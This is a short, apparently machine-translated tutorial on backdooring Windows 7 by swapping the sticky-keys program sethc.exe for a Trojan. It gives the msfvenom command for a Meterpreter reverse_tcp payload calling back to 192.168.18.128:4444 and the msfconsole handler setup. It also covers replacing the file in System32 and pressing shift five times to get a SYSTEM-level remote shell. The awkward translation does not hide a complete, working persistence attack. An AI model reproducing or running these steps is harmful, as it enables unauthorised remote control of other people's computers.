operating system : Windows 7 Flagship Edition
tool : kali Systematic msfconsole
5 second shift Principle of safeguarding rights
Windows In the system ,5 second shift Key can trigger sticky key , that is C:\Windows\System32\sethc.exe, We will cmd.exe Change to sethc.exe And replace the original sticky key , You can log in through the 5 second shift Key execution cmd, And yes system jurisdiction
in addition to , You can also use other tools to replace sethc.exe
First step , use kali of msfconsole Generate Trojan horse tool
1. open MSF
msfconsole
2. Using development modules
use exploit/multi/handler
3. Generate Trojan horse ,lhost Write your own ip,lport Write your own port , The function is to rebound shell To specify ip Port of
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f
exe -o sethc.exe
4. Because I open the terminal on the desktop , The generated Trojan file will be in the user's root directory , Open another terminal to view the file location
Step two , Listening port , Receive rebound shell
1. generate payload
set payload windows/meterpreter/reverse_tcp
2. Set bounce shell Location of ( own ip )
set lhost 192.168.18.128
3. Set port for bounce
set lport 4444
4. Turn on listening
exploit
Step 3 , replace sethc.exe
Upload the generated Trojan horse tool to the target host c:/windows/system32 Under the directory , And replace the original sethc.exe
source sethc.exe It cannot be modified or deleted directly , Need to modify permissions
Step 4 ,5 second shift trigger sethc.exe And rebound shell
1. Press on the target host 5 second shift trigger sethc.exe, No response , Because the program was replaced
2. see kali Listening status of , input shell You can enter the command line of the target host , And execute system commands
Technology